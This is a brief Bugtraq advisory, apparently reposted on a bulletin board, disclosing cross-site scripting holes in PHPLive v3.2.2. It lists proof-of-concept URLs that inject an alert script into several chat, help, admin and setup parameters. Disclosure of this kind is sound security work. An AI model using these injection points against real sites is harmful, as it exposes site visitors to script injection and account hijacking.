bugtraq submission

看板Bugtraq作者時間18年前 (2007/06/02 01:49), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
There are numerous XSS vulnerabilities in PHPLive v3.2.2 (Maybe others) /phplive/chat.php?sid=<script>alert(123);</script> /phplive/help.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script> /phplive/help.php?PHPLIVE_VERSION=<script>alert(123);</script> /phplive/admin/header.php?admin[name]=<script>alert(123);</script> /phplive/super/info.php?BASE_URL=<script>alert(123);</script> And if serveradmin left default setup install files: /phplive/setup/footer.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script> /phplive/setup/footer.php?PHPLIVE_VERSION=<script>alert(123);</script> /phplive/setup/footer.php?nav_line=<script>alert(123);</script> Bug found by ReZEN! XORCREW! H4X H4X!
文章代碼(AID): #16O5mC00 (Bugtraq)